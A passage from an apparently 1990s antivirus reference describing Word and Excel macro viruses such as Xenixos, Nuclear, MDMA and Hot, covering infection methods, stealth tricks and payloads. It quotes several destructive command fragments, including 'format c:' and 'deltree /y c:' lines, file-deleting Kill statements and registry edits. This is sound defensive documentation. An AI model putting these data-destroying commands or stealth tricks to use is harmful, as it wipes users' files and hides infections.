  14969. When an infected file is opened, the virus infects the
  14970. global template "Normal.dot" by inserting a single
  14971. macro.
  14972.  
  14973. Once the virus is active, it will infect all new
  14974. documents when they are closed.
  14975.  
  14976.  
  14977. [Winexcel.DMV]
  14978. Virus Name: Winexcel.DMV (Demonstration Macro Virus)
  14979. Virus Type: Excel macro virus
  14980. Virus Length: N/A
  14981.  
  14982. Description: This virus infects MS Excel documents.
  14983.  
  14984. This virus consists of the following macros:
  14985.  
  14986.     AutoClose
  14987.  
  14988. When an infected file is closed, the virus adds a
  14989. single macro to the global macro file.  Subsequent
  14990. files which are closed also have the macro attached.
  14991.  
  14992. This virus does not work because of a bug in the
  14993. program.
  14994.  
  14995.  
  14996. [Word_Xenixos]
  14997. Virus Name: Word.Xenixos
  14998. Alias Name: Nemesis, Xos, Evil One, Xenixos:De
  14999. Virus Type: Word macro virus
  15000. Virus Length: 31342 Bytes (11 Macros)
  15001. Infection: German Microsoft Word documents and templates
  15002.  
  15003. Symptoms:Text added to printed documents
  15004.          Format of C:\ drive
  15005.          Change of C:\AUTOEXEC.BAT
  15006.          Display of windows
  15007.  
  15008. Description: This virus infects MS Word documents.
  15009. Xenixos is the first macro virus that was written especially
  15010. for the German version of Microsoft Word. All macro
  15011. names are in German, and therefore it only works with the
  15012. German Word version. The virus was found in Austria, and
  15013. is also posted in Usenet.
  15014.  
  15015. The following macros can be found in infected documents
  15016. and viewed with the Datei|Dokumentvorlage|Organisieren|Makros command.
  15017.  
  15018. "AutoExec"
  15019. "AutoOpen"
  15020. "DateiBeenden"
  15021. "DateiDrucken"
  15022. "DateiDruckenStandard"
  15023. "DateiOeffnen"
  15024. "DateiSpeichern"
  15025. "DateiSpeichernUnter"
  15026. "Drop"
  15027. "Dummy"
  15028. "ExtrasMakro"
  15029.  
  15030. The infected global template (NORMAL.DOT) includes
  15031. the following additional macros:
  15032.  
  15033. "AutoClose"
  15034. "AutoExit"
  15035. "AutoNew"
  15036.  
  15037. They all contain the empty macro "Dummy".
  15038.  
  15039. Upon opening of an infected document, Xenixos infects
  15040. the global template unless the "DateiSpeichernUnter"
  15041. macro is already present. Xenixos spreads upon using the
  15042. "DateiSpeichern" ("FileSave") and "DateiSpeichernUnter"
  15043. ("FileSaveAs") command. All its macros are Execute-Only,
  15044. and therefore they can not be viewed or modified. Files with
  15045. the name "VIRUS.DOT" will not become infected.
  15046.  
  15047. During infection, Xenixos checks the system date and then
  15048. activates various destructive payloads according to the
  15049. date. During the month of May it adds the following
  15050. text to "C:\AUTOEXEC.BAT":
  15051.  
  15052. "    @echo j format c: /u > nul   "
  15053.  
  15054. This will format the C:\ drive if the DOS "format"
  15055. command is present.
  15056.  
  15057. During the month of March, Xenixos tries to activate the
  15058. DOS-Virus "Neuroquila" by using a DOS DEBUG script.
  15059. This part of the virus is faulty (it tries to create an .EXE file)
  15060. and therefore the DOS-based virus never infects the system.
  15061.  
  15062. The third destructive payload checks the system time,
  15063. and in case of a value bigger than 45 in the seconds field,
  15064. it will add the password "XENIXOS" to a saved document.
  15065.  
  15066. Upon printing a document, Xenixos checks the system
  15067. time again, and in case of a value smaller than 30 in the
  15068. seconds field, it will add the following text to the end of the
  15069. printed document:
  15070.  
  15071. "    Nemesis Corp.                          "
  15072.  
  15073. Xenixos also includes some additional tricks to make its
  15074. detection more difficult. It turns off the prompting of
  15075. Word before saving a modified global template and replaces
  15076. the Tools|Macros command with a code that will display the
  15077. following error message instead of the activation of
  15078. Word's built-in macro viewer/editor:
  15079.  
  15080. "  Diese Option ist derzeit leider nicht verfuegbar    "
  15081.  
  15082. (This prevents the user from seeing the virus macros).
  15083.  
  15084. Upon starting MS Word, Xenixos copies parts of its virus
  15085. macros and saves them with new names, (for example:
  15086. "DateiSpeichern" -> "DateiSpeichernBak").
  15087. After a document is opened, Xenixos restores its backups.
  15088.  
  15089. The following text is also found in the virus code, yet is
  15090. never displayed:
  15091.  
  15092. " Brought to you by the Nemesis Corporation (c) 1996 "
  15093.  
  15094. In addition, Xenixos changes section "Compatibility"
  15095. inside the WIN.INI file.  It sets the variable "RR2CD"
  15096. to the value "0x0020401", and the variable "Diag$" to
  15097. "0". The WIN.INI variables can be used to deactivate
  15098. the virus.  Setting the variable "Diag$" to "1" will
  15099. prevent most of the destructive payloads.
  15100.  
  15101. Some replicants of Xenixos will also display the following
  15102. Wordbasic error message:
  15103.  
  15104. "  Falscher Parameter  "
  15105.  
  15106.  
  15107. [Word_Wieder]
  15108. Virus Name: Word.Wieder
  15109. Alias Name: Wieder, Pferd
  15110. Virus Type: Word macro virus
  15111. Virus Length: 638 Bytes (2 Macros)
  15112. Symptoms: C:\Autoexec.bat is moved and deleted
  15113. Place of origin: Germany
  15114. Description: This virus infects MS Word documents.
  15115. Wieder is a not a virus but a trojan horse, since it does
  15116. not infect other files.
  15117.  
  15118. The following unencrypted macros can be found inside
  15119. infected documents:
  15120. "AutoClose"
  15121. "AutoOpen"
  15122. When opening an infected document, Wieder creates
  15123. the directory "C:\TROJA", and moves the system file
  15124. "C:\AUTOEXEC.BAT" into the newly created directory.
  15125. After moving the file the original files are deleted.
  15126.  
  15127. When closing an infected document, the following text
  15128. is displayed:
  15129.  
  15130. "Auf Wieder÷ffnen"
  15131.  
  15132. "P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei"
  15133. "gerne wiederhaben moechten, sollten Sie einen"
  15134. "Blick in das neue Verzeichnis C:\TROJA werfen..."
  15135.  
  15136. Any Word 2.0 documents which include the trojan,
  15137. includes the following text:
  15138.  
  15139. "Trojanisches Pferd "
  15140. "Wenn Sie diese Zeilen lesen, wurde bereits Ihre
  15141. AUTOEXEC.BAT- Datei aus dem"
  15142. "Hauptverzeichnis C:\ entfernt. Hoffentlich haben Sie
  15143. eine Kopie davon ?    "
  15144.  
  15145. "Genauso einfach waere es gewesen, Ihre Festplatte
  15146. zu loeschen und mit ein  "
  15147. "klein wenig mehr Aufwand koennte man auch einen Virus
  15148. installieren. "
  15149. (c) Stefan Kurtzhals
  15150.  
  15151.  
  15152. [Word_Wazzu]
  15153. Virus Name: Word.Wazzu
  15154. Alias Name: WM.Wazzu
  15155. Virus Type: Word macro virus
  15156. Virus Length: 632 Bytes (1 Macro)
  15157. Symptoms: Words in the active document are erased
  15158.           The word 'wazzu' is inserted
  15159. Place of origin: Washington, United States
  15160. Description: This virus infects MS Word documents.
  15161. Wazzu.A has only one unencrypted macro which has
  15162. a size of 632 Bytes, (starting letter is not capitalized).
  15163.  
  15164. "autoopen"
  15165.  
  15166. When an infected document is opened, Wazzu.A checks
  15167. the name of the active document. If it is
  15168. "NORMAL.DOT", then the virus macro is copied from the
  15169. global template (NORMAL.DOT) to the open document.
  15170. Otherwise, NORMAL.DOT becomes infected. Upon infection, documents
  15171. are changed into templates which is very common for macro viruses.
  15172.  
  15173. Wazzu does not bypass the prompting from Microsoft
  15174. Word before saving the NORMAL.DOT file. Also
  15175. Wazzu.A does not check if a document is already
  15176. infected. It simply overwrites the "autoopen" macro.
  15177.  
  15178. Wazzu has a destructive payload. It picks a random
  15179. number between 0 and 1, and if the number is smaller
  15180. than 0.2 (probability of 20 percent), the virus will
  15181. move a word from one place in the document to
  15182. another. This is repeated three times. So the probability
  15183. for a Word to be moved is 48.8 percent.  After the third
  15184. time, Wazzu picks a final random number (between 0 and 1)
  15185. and if the value is higher than 0.25 (probability of 25
  15186. percent), the word Wazzu will be inserted into the document.
  15187.  
  15188. After an infected documents is cleaned, it has to be
  15189. checked really careful because chances of having a
  15190. modified document (words swapped or added) are
  15191. over 61 percent. This can be a very time consuming
  15192. job with large documents.
  15193.  
  15194. Wazzu is a nickname for the Washington State University.
  15195. Since Wazzu.A uses the "autoopen" macro, it also
  15196. works with other versions of Microsoft Word, such as
  15197. the German version.
  15198. (c) Stefan Kurtzhals
  15199.  
  15200.  
  15201. [Word_Reflex]
  15202. Virus Name: Word.Reflex
  15203. Alias Name: RedDwarf
  15204. Virus Type: Word macro virus
  15205. Virus Length: 897 Bytes in .doc files and 1226
  15206.             Bytes in .dot files (3 or 4 Macros)
  15207. Symptoms: Display of Windows
  15208. Place of origin: Ireland
  15209. Description: This virus infects MS Word documents.
  15210.  
  15211. Delete virus macros from infected documents
  15212. (AutoOpen, FClose, FileClose, FA)
  15213. Reflex contains 3 encrypted macros (Execute-Only) with
  15214. a size of 897 Bytes.
  15215. "AutoOpen"
  15216. "FClose"
  15217. "FileCLose"
  15218. An infected global template contains one more macro
  15219. ("FA"). Upon infection, Reflex turns off the prompting of
  15220. Word to ensure a hidden infection of the global template
  15221. (NORMAL.DOT). Infected documents are saved with the
  15222. password "Guardian." They are also converted internally
  15223. to templates, which is very common for macro viruses.
  15224.  
  15225. Reflex was written at an antivirus conference after an
  15226. Anti-Virus company announced a challenge to hackers
  15227. to break its new technology. Any author of a new
  15228. undetected macro virus was supposed to receive
  15229. champagne as a reward.
  15230.  
  15231. When Reflex infects a file it displays the following window:
  15232. "Now, Where's that Jerbil of Bubbly? "
  15233.  
  15234. Some replicants of Reflex will also display the following
  15235. Wordbasic error message:
  15236.  
  15237. "Document not open"
  15238.  
  15239.  
  15240. [Word_Polite]
  15241. Virus Name: Word.Polite
  15242. Alias Name: WW2Demo
  15243. Virus Type: Word macro virus
  15244. Virus Length: 1918 Bytes (2 Macros)
  15245. Symptoms: Display of text windows
  15246. Place of origin: United States
  15247. Description: This virus infects MS Word documents.
  15248.  
  15249. Polite was first created with Microsoft version 2.0, yet
  15250. also works with higher versions because newer releases
  15251. of Word are compatible with older versions.
  15252.  
  15253. Polite consists of two unencrypted macros with a size
  15254. of 1918 Bytes.
  15255. "FileClose"
  15256. "FileSaveAs"
  15257. Polite can be called a demonstration virus and is very
  15258. unlikely to spread. Before each attempted infection,
  15259. it displays a window with the following question:
  15260.  
  15261. " Shall I infect the file ? "
  15262.  
  15263. If the user answers with the "No" button, no documents
  15264. gets infected.  While it asks for permission to infect
  15265. files, it does not ask for permission to infect the global
  15266. template (NORMAL.DOT).
  15267.  
  15268. Upon infection of the global template or when an infected
  15269. document is closed, Polite will display the following
  15270. message:
  15271.  
  15272. "I am alive! "
  15273.  
  15274.  
  15275. Once Polite infects a Word 6.0/7.0 document it can not
  15276. infect Word 2.0 documents anymore.
  15277.  
  15278. The global template (NORMAL.DOT) becomes infected
  15279. when an infected document is closed (only when there is
  15280. no FileClose macro). Documents become infected upon
  15281. using the "FileSaveAs" command. Polite does not use any
  15282. Auto-macros and therefore cannot be blocked by the
  15283. /m parameter.
  15284.  
  15285. Polite does not work with foreign versions of Microsoft
  15286. Word, since it uses the English macro names "FileSaveAs"
  15287. and "FileClose".
  15288.  
  15289. (c) Stefan Kurtzhals
  15290.  
  15291.  
  15292. [Word.Pheeew]
  15293. Virus Name: Word.Pheeew
  15294. Alias Name: Dutch, NietGoed, Pheeew:NL
  15295. Virus Type: Word macro virus
  15296. Virus Length: 2759 Bytes (4 Macros)
  15297. Symptoms: Display of text,
  15298.          Deletes files in C:\ and C:\DOS
  15299. Place of origin: Unknown
  15300. Description: This virus infects MS Word documents.
  15301.  
  15302. Pheeew is the first Dutch macro virus, which is strongly
  15303. based on the Concept macro virus. Pheeew also has 4
  15304. unencrypted macros:
  15305.  
  15306. "AutoOpen"
  15307. "IkWordNietGoed1"
  15308. "IkWordNietGoed2"
  15309. "Lading"
  15310.  
  15311. When an infected document is opened, Pheeew checks
  15312. for a previous infection of the global template
  15313. (NORMAL.DOT). Pheeew does this by looking for the
  15314. two names of the macros "Lading" and "BestandOpslaanAls".
  15315. When NORMAL.DOT is not infected, Pheeew copies its
  15316. virus macros into the global template.  The macro
  15317. "IkWordNietGoed2" is saved under the name
  15318. "BestandOpslaanAls" ("FileSaveAs").
  15319.  
  15320. Documents are infected when the "FileSaveAs" command
  15321. is used. Documents are also changed into templates which
  15322. is very common for macro viruses. After infection the
  15323. virus shows various windows with the following text:
  15324.  
  15325. Window "Important":
  15326. " Gotcha ! "
  15327. Window "FINAL WARNING!":
  15328. "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC"
  15329.  
  15330. Upon clicking the "No" button on the last window, a destructive
  15331. payload is activated. All files in the "C:\" and "C:\DOS" are
  15332. deleted (certain file attributes are bypassed).
  15333.  
  15334. Pheeew also contains the following texts:
  15335.  
  15336. "Done by the Catman "
  15337. Macro "Lading":
  15338. " Sub MAIN                                                         "
  15339. "   REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC             "
  15340. "   REM              *** WARNING ***                               "
  15341. "   REM You're computer could be killed right now!                 "
  15342. "   REM Thank to you and me it's still ok!                         "
  15343. "   REM Next time will be worse!                                   "
  15344. "   REM              *** PHEEEW! ***                               "
  15345. "   REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC             "
  15346. " End Sub                                                          "
  15347. Pheeew does not work with versions other than the Dutch version
  15348. of Microsoft Word.
  15349.  
  15350. (c) Stefan Kurtzhals
  15351.  
  15352.  
  15353. [Word_PCW]
  15354. Virus Name: Word.PCW
  15355. Alias Name: Birthday, B-Day, Suzanne
  15356. Virus Type: Word macro virus
  15357. Virus Length: 1039 Bytes (2 Macros)
  15358. Symptoms: Display of message
  15359. Place of origin: German computer magazine
  15360. Description: This virus infects MS Word documents.
  15361.  
  15362. PCW contains two encrypted (Execute-Only) macros
  15363. with a size of 1039 Bytes.
  15364. "AutoOpen"
  15365. "DateiSpeichernUnter"
  15366. The name was selected because its code was published
  15367. in the German magazine "PC Welt". We expect to see
  15368. other variants of this virus, since the code was available
  15369. to the public.
  15370.  
  15371. Upon opening an infected document, PCW will infect
  15372. the global template (NORMAL.DOT). Further
  15373. documents are infected when the "DateiSpeichernUnter"
  15374. command is used. Infected documents are internally
  15375. converted into templates, which is very common for
  15376. macro viruses. PCW is also known under the name
  15377. "Birthday", since it displays the following window:
  15378.  
  15379. " Happy Birthday! Herzlichen Glⁿckwunsch... "
  15380.  
  15381. PCW uses German macro names and will therefore only
  15382. work with the German version of Microsoft Word.
  15383.  
  15384.  
  15385. [Word_Nuclear]
  15386. Virus Name: Word.Nuclear
  15387. Alias Name: Alert
  15388. Virus Type: Word macro virus
  15389. Virus Length: 10556 Bytes (9 Macros)
  15390. Symptoms: Text added to printed documents
  15391.           System files deleted on April 5th
  15392. Place of origin: Australia
  15393. Description: This virus infects MS Word documents.
  15394.  
  15395. Nuclear was the second macro virus found "In-the-Wild"
  15396. (after Concept). It was distributed over the Internet in
  15397. a document with information about the Concept virus.
  15398. It was also the first macro virus that used Execute-Only
  15399. (encrypted) macros to make analysis more difficult.
  15400.  
  15401. Nuclear has 9 macros with a size of 10556 Bytes.
  15402.  
  15403. "AutoExec"
  15404. "AutoOpen"
  15405. "DropSuriv"
  15406. "FileExit"
  15407. "FilePrint"
  15408. "FilePrintDefault"
  15409. "FileSaveAs"
  15410. "InsertPayload"
  15411. "Payload"
  15412.  
  15413. Nuclear is activated with the "AutoExec" and "AutoOpen"
  15414. macros. Before it infects the global template
  15415. (NORMAL.DOT), it checks for a previous infection. It
  15416. does not infect if it finds the "AutoExec" macro.
  15417.  
  15418. After the virus macros have been transferred to the
  15419. global template, Nuclear can call some destructive
  15420. payloads. In the first it will try and drop the "Ph33r"
  15421. virus. Between 17:00 and 17:59 it creates a text file,
  15422. including a script of the DOS/Windows-EXE virus
  15423. "Ph33r". It then uses the DOS command "DEBUG.EXE"
  15424. to convert the file into an executable file. It also creates the
  15425. "EXEC_PH.BAT" batch file, and calls it via the Dos shell.
  15426. This last infection routine is faulty, the DOS-window is
  15427. closed immediately and the "Ph33r" virus never infects
  15428. the system.
  15429.  
  15430. In the second, upon printing a document, Nuclear checks
  15431. the system time and in case of a value bigger than 55
  15432. in the Seconds field, it will add the following text at
  15433. the end of the printed document:
  15434.  
  15435.  "And finally I would like to say: "
  15436.  
  15437.  "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC
  15438.  
  15439. The third destructive payload is activated on April 5th,
  15440. when Nuclear deletes the system files "C:\IO.SYS",
  15441. "C:\MSDOS.SYS" and "C:\COMMAND.COM.
  15442.  
  15443. Upon closing a file, Nuclear.A turns off the prompting
  15444. of Word to ensure a hidden infection of the global
  15445. template (NORMAL.DOT). This protective function
  15446. of Word is therefore ineffective against Nuclear.
  15447.  
  15448. Nuclear infects documents when they are saved with
  15449. the "FileSaveAs" function, whereby all infected documents
  15450. are internally converted into templates. In addition Nuclear
  15451. does not check documents for a previous infection, it simply
  15452. overwrites existing macros.
  15453.  
  15454. Since Nuclear uses English macro names, such as
  15455. "FileSaveAs", it does not work with foreign versions of
  15456. Microsoft Word, such as the German version.
  15457. (c) Stefan Kurtzhals
  15458.  
  15459.  
  15460. [Word_NOP]
  15461. Virus Name: Word.NOP
  15462. Alias Name: Nop.A:De
  15463. Virus Type: Word macro virus
  15464. Virus Length: 246 Bytes (2 Macros)
  15465. Symptoms: No destructive symptoms
  15466. Place of origin: Germany
  15467. Description: This virus infects MS Word documents.
  15468.  
  15469. NOP is the smallest known macro virus having a size of
  15470. only 246 Bytes. Infected documents contain the following
  15471. two macros:
  15472.  
  15473. "AutoOpen"
  15474. "NOP"
  15475.  
  15476. NOP is very primitive and has only very few necessary
  15477. commands to replicate. Both of its two macros are not
  15478. encrypted. The only special characteristic is that it turns
  15479. off the prompting of Word before saving the global template
  15480. (NORMAL.DOT).
  15481.  
  15482. When an infected document is opened, the virus transfers
  15483. itself to the global template and renames "NOP" into
  15484. "DateiSpeichernUnter" ("FileSaveAs").
  15485. Additional documents become infected when they are
  15486. saved. Upon infection documents are also converted to
  15487. templates which is very common for macro viruses.
  15488.  
  15489. NOP.A does not have a destructive payload, mistake
  15490. checking, or recognition of already infected documents.
  15491. Virus macros of already infected documents are simply
  15492. overwritten. NOP.A uses the macro name "DateiSpeichern"
  15493. ("FileSave"), and works therefore only with the German version
  15494. of Microsoft Word.
  15495.  
  15496. (c) Stefan Kurtzhals
  15497.  
  15498.  
  15499. [Word_NF]
  15500. Virus Name: Word.NF
  15501. Alias Name: Names, NF:De
  15502. Virus Type: Word macro virus
  15503. Virus Length: 4209 Bytes (6 Macros)
  15504. Symptoms: Display of Windows
  15505. Place of origin: United States
  15506. Description: This virus infects MS Word documents.
  15507.  
  15508. NF contains 2 encrypted macros (Execute-Only) with
  15509. a size of 286 Bytes.
  15510.  
  15511. "AutoClose"
  15512. "NF"
  15513.  
  15514. When an infected document is opened, NF will infect
  15515. the global template (NORMAL.DOT). Further documents are
  15516. infected when they are closed. Infected documents are converted
  15517. internally to templates which is very common for macro viruses.
  15518. Upon infection, NF will display the following message at the bottom
  15519. of the screen:
  15520.  
  15521. "Traced!"
  15522.  
  15523. NF is one of the very few non-destructive macro viruses.
  15524.  
  15525. [Word_MDMA]
  15526. Virus Name: Word.MDMA
  15527. Alias Name: StickyKeys, MDMA-DMV
  15528. Virus Type: Word macro virus
  15529. Virus Length: 1635 Bytes (1 Macro)
  15530. Symptoms: Files are deleted
  15531. Place of origin: United States
  15532. Description: This virus infects MS Word documents.
  15533.  
  15534. MDMA is the first macro virus that will work on
  15535. Windows, Windows 95, Macintosh and Windows NT.
  15536. It can be a very destructive macro virus, and Word users
  15537. are strongly advised to check their system with an
  15538. up-to-date anti-virus program.
  15539.  
  15540. MDMA contains only one macro with a size of 1635 Bytes.
  15541.  
  15542. "AutoClose"
  15543.  
  15544. When an infected document is opened and then closed,
  15545. MDMA infects the global template (NORMAL.DOT).
  15546. Further documents are infected when they are closed ("AutoClose").
  15547. Infected documents are also converted to templates which is very
  15548. common for macro viruses.
  15549.  
  15550. If an infected document is loaded on the first of each month,
  15551. MDMA activates its destructive payloads. The following payloads
  15552. will be executed depending on the operating system:
  15553.  
  15554. Windows:
  15555. --------
  15556. Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat
  15557. This will delete all the directories on the C:\ drive.
  15558.  
  15559. Windows NT:
  15560. -----------
  15561. Kill "*.*"; Kill "c:\shmk."
  15562. This will delete all the files on the C:\ drive
  15563.  
  15564. Macintosh:
  15565. ----------
  15566. Kill MacID$("****")
  15567. This will delete all files on the hard drive.
  15568.  
  15569. Windows 95:
  15570. -----------
  15571. Kill "c" \shmk."; Kill "c:\windows\*.hlp";
  15572. Kill "c:\windows\system\*.cpl"
  15573. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  15574. Panel\Accessibility\Stickykeys", "On", "1", "")
  15575. SetPrivateProfileString
  15576. ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","")
  15577. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  15578. Panel\Accessibility\HighContrst", "On", "1", "")
  15579.  
  15580. MDMA will also display the following window:
  15581.  
  15582. "  You are infected with MDMA_DMV. Brought to you
  15583. by MDMA (Many Delinquent  "
  15584. "  Modern Anarchists)."
  15585.  
  15586. To combat destructive macro viruses, such as MDMA, we advise users
  15587. to use an up-to-date anti-virus program.
  15588.  
  15589. Microsoft has also released a new Microsoft Word version,
  15590. which will warn each time a suspicious macro is loaded.
  15591. Users can then decide if they want to disable the macro.
  15592.  
  15593. The Microsoft Word upgrade is available for a small fee from Microsoft.
  15594.  
  15595.  
  15596. [Word_Maddog]
  15597. Virus Name: Word.Maddog
  15598. Virus Type: Word macro virus
  15599. Virus Length: 4209 Bytes (6 Macros)
  15600. Symptoms: Documents contain the text string "MadDog"
  15601. Place of origin: Georgia, United States
  15602. Description: This virus infects MS Word documents.
  15603.  
  15604. Maddog contains 6 macros with a size of 4209 Bytes.
  15605.  
  15606. "AutoOpen"
  15607. "AutoClose"
  15608. "AutoExec"
  15609. "FileClose"
  15610. "FcFinish"
  15611. "AopnFinish"
  15612.  
  15613. When an infected document is opened, MadDog will infect the global
  15614. template (NORMAL.DOT). Further documents are infected when they are
  15615. close with the "FileClose" command. Upon closing a document, MadDog
  15616. saves various times to "Temp1" and then saves the active document.
  15617. Infected documents are converted internally into templates, which is
  15618. very common for macro viruses.
  15619.  
  15620. Infected documents contain the text string "MadDog".
  15621.  
  15622. [Word.Tele]
  15623. Virus Name: Word.Tele
  15624. Alias Name: LBYNJ:De, Telefonica, Tele, TEC, Tele-Sex
  15625. Virus Type: Word macro virus
  15626. Virus Length: 22256 Bytes (7 Macros)
  15627. Symptoms: Infection with the Kampana.3784 DOS based virus,
  15628.           Text added to printed documents
  15629. Place of origin: Germany
  15630. Description: This virus infects MS Word documents.
  15631.  
  15632. LBYNJ is another German macro virus, which is probably based on
  15633. the previous macro viruses, such as Xenixos. The 7 encrypted
  15634. (Execute-Only) macros of LBYNJ have a size of 22256 Bytes.
  15635.  
  15636. "AutoExec"
  15637. "AutoOpen"
  15638. "DateiBeenden"
  15639. "DateiDrucken"
  15640. "DateiNeu"
  15641. "DateiOeffnen"
  15642. "Telefonica"
  15643.  
  15644. The macro "AutoExec" includes the infection routine
  15645. for the global template (NORMAL.DOT), which will not
  15646. get infected when inside the WIN.INI file. In entry
  15647. "Compatibility", the string "0x0030303" is set to "LBYNJ".
  15648.  
  15649. "AutoExec" also calls the destructive payload in the
  15650. "Telefonica" macro.  "AutoOpen" starts the "AutoExec"
  15651. macro, which means the NORMAL.DOT will become
  15652. infected when an infected document is opened. LBYNJ
  15653. uses the "Telefonica" macro to check for a previous
  15654. infection. It will not infect the global template if the macro
  15655. is already present.
  15656.  
  15657. Documents are infected upon "DateiBeenden"
  15658. ("FileClose"), "DateiNeu" ("FileNew") and "DateiOeffnen"
  15659. ("FileOpen"), whereby at the end of "DateiOeffnen"
  15660. ("FileOpen") the macro "Telefonica" is called again.
  15661. Infected documents are changed to templates, which
  15662. is very common for macro viruses.
  15663.  
  15664. LBYNJ has two destructive payloads. The first can be
  15665. found in the "DateiDrucken" (FilePrint) macro. Upon
  15666. printing a document, LBYNJ checks the system time
  15667. and in case of a value less than 10 in the seconds field,
  15668. it will add the following text at the end of the printed document:
  15669.  
  15670. " Lucifer by Nightmare Joker (1996) "
  15671.  
  15672. The second payload is activated from the "Telefonica"
  15673. macro when the second field has a value of 0 or 1.
  15674. ("Telefonica" is called from "AutoOpen", "AutoExec"
  15675. and "DateiOeffnen"). LBYNJ creates a Debug script (filename:
  15676. TELEFONI.SCR) inside the "C:\DOS" directory which includes the DOS
  15677. based virus "Kampana.3784".
  15678.  
  15679. After creating the script file, LBYNJ executes the
  15680. "TELEFONI.BAT" batch file which will use the DOS command
  15681. "DEBUG.EXE" to convert the script file into an executable
  15682. DOS-based virus and then start it.
  15683. (c) Stefan Kurtzhals
  15684.  
  15685.  
  15686. [Word_Irish]
  15687. Virus Name: Word.Irish
  15688. Virus Type: Word macro virus
  15689. Virus Length: 4152 Bytes (4 Macros)
  15690. Symptoms: Display of windows
  15691. Place of origin: USA
  15692. Description: This virus infects MS Word documents.
  15693.  
  15694. Irish contains 4 macros with a size of 4152 Bytes.
  15695.  
  15696. "AutoOpen"
  15697. "WordHelp"
  15698. "AntiVirus"
  15699. "WordHelpNT"
  15700.  
  15701. Upon opening an infected document, Irish will infect the
  15702. global template (NORMAL.DOT). An infected global
  15703. template contains the "FileSave" macro, instead of
  15704. "AutoOpen". Further documents are infected when the
  15705. "FileSave" command is used. Infected documents are
  15706. converted internally to templates which is very common
  15707. for macro viruses.
  15708.  
  15709. Two of the macros, "WordHelp" and "WordHelpNT",
  15710. do not run automatically. However, when executed
  15711. manually by the user, they will change the Windows
  15712. desktop color to green.
  15713.  
  15714. The macro "WordHelpNT" contains a payload which
  15715. attempts to activate the screen saver and display the
  15716. following message:
  15717.  
  15718. "Happy Saint Patties Day "
  15719.  
  15720. However, the payload seems to be faulty and does not
  15721. work under Windows 95 (Irish only exists in Microsoft Word).
  15722.  
  15723.  
  15724. [Word_DMV]
  15725. Virus Name: Word.DMV
  15726. Alias Name: Impost, Imposter.A, Imposter
  15727. Virus Type: Word macro virus
  15728. Virus Length: 907 Bytes (2 Macros)
  15729. Symptoms: Display of text windows: "DMV"
  15730. Place of origin: England
  15731. Description: This virus infects MS Word documents.
  15732.  
  15733. DMV is based on the Concept virus, with only 2 unencrypted macros.
  15734.  
  15735. "FileClose"
  15736. "DMV"   (FileSaveAs in NORMAL.DOT)
  15737.  
  15738. The global template (NORMAL.DOT) becomes infected
  15739. when an infected document is closed and the macros
  15740. "DMV" and "FileSaveAs" are not present. When Imposter.A copies the
  15741. "DMV" macro, it renames it to "FileSaveAs" and displays the
  15742. following window:
  15743.  
  15744.  "DMV"
  15745.  
  15746. Further documents are infected when the "FileSaveAs"
  15747. command is used.  Imposter also changes the new
  15748. infected document to a template, which is very common
  15749. for macro viruses.  The following text can be found inside
  15750. DMV, but is not displayed:
  15751.  
  15752. " just to prove another point "
  15753.  
  15754. (This text is based on the Concept virus, which has "this
  15755. is enough to prove my point" in its code).
  15756.  
  15757. Because of the use of English macro names, the DMV
  15758. virus does not work with Non-English versions such as the
  15759. German version of Microsoft Word.
  15760.  
  15761. (c)  Stefan Kurtzhals
  15762.  
  15763.  
  15764. [Word_Hot]
  15765. Virus Name: Word.Hot
  15766. Alias Name: WM.Hot
  15767. Virus Type: Word macro virus
  15768. Virus Length: 5515 Bytes (4 Macros)
  15769. Symptoms: Text inside documents is deleted
  15770. Place of origin: Unknown
  15771. Description: This virus infects MS Word documents.
  15772.  
  15773. Hot is a complex virus with 4 encrypted viruses. When
  15774. an infected document is opened the virus is activated
  15775. by the AutoOpen macro. Some replicated Hot samples
  15776. also display the following error message:
  15777.  
  15778. "Unable to load the specified library"
  15779.  
  15780. First, Hot turns off the prompting of Word to ensure a
  15781. hidden infection of the global template (NORMAL.DOT).
  15782. It also checks the file "WINWORD6.INI" for the following
  15783. entry: "QLHot". If it does not exist, Hot will record a
  15784. "hot date", 14 days in the future. If this variable is not
  15785. already set, the global template becomes infected.
  15786.  
  15787. The InsertPBreak/InsertPageBreak macro does, as its name
  15788. suggest, will insert a page-break in the current document.
  15789. However, it is also used by the virus to recognize if a
  15790. document is already infected.
  15791.  
  15792. Some of the macros are renamed when they are copied
  15793. by the WordBasic "MacroCopy" command:
  15794.  
  15795. "AutoOpen"          becomes  "StartOfDoc"
  15796. "DrawBringInFrOut"  becomes  "AutoOpen"
  15797. "InsertPBreak"      becomes  "InsertPageBreak"
  15798. "ToolsRepaginat"    becomes  "FileSave"
  15799.  
  15800. In addition, the global template contains the following macros:
  15801.  
  15802. "FileSave" (similar to "ToolsRepaginat")
  15803. "StartOfDoc" (similar to "AutoOpen")
  15804.  
  15805. Hot also uses special functions from the Windows file
  15806. "KERNEL.EXE" (Win API).  It uses the API to find the
  15807. path to Windows and to open files which provide simple functions.
  15808. It should be noted that many other options were available to the
  15809. virus author.
  15810.  
  15811. The destructive payload, which is activated upon arrival
  15812. of the "hot date" set under the "QLHot" section in the
  15813. WINWORD6.ini file, deletes text from the current active
  15814. document. This payload is bypassed if the file EGA5.CPI
  15815. is present in the "C:\DOS" directory.
  15816.  
  15817. A comment in the virus source code suggests that this is a
  15818. "feature" designed to protect the virus author and his friends.
  15819. (c) Stefan Kurtzhals
  15820.  
  15821.  
  15822.  
  15823.  
  15824.  
  15825. [Word-Hassle]
  15826.  
  15827. Virus Name: Word.Hassle
  15828. Alias Name: Bogus
  15829. Virus Type: Word macro virus
  15830. Virus Length: 8283 Bytes (7 Macros)
  15831. Symptoms: Display of windows
  15832. Place of origin: USA
  15833. Description: This virus infects MS Word documents.
  15834.  
  15835. Hassle contains 7 encrypted (Execute-Only) macros with
  15836. a size of 8283 Bytes.
  15837.  
  15838. "AutoClose"
  15839. "ToolsMacro"
  15840. "Microsoft01"
  15841. "Microsoft02"
  15842. "Microsoft03"
  15843. "Microsoft04"
  15844. "Microsoft05"
  15845.  
  15846. When an infected document is opened, Hassle will
